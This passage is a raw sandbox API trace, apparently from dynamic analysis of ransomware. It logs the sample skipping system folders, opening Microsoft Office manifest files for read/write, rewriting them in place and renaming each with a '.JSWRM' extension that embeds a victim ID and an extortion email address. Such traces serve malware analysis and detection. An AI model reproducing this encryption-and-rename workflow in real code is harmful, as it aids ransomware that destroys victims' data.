cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.859] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.859] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.859] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.861] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.861] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.861] CloseHandle (hObject=0x458) returned 1 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0072.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.862] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.863] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cAlternateFileName="APF00A~1.XML")) returned 1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.863] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.864] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1450) returned 1 [0072.864] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a0) returned 0x23fc98 [0072.864] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ef6c*=0x5a0, lpOverlapped=0x0) returned 1 [0072.865] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.865] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ef68*=0x5a0, lpOverlapped=0x0) returned 1 [0072.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0072.866] CloseHandle (hObject=0x458) returned 1 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0072.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0072.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0072.866] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.867] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~2.XML")) returned 1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.867] lstrcmpiW (lpString1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.868] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.868] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.868] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.870] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.870] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.870] CloseHandle (hObject=0x458) returned 1 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0072.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0072.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.871] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, 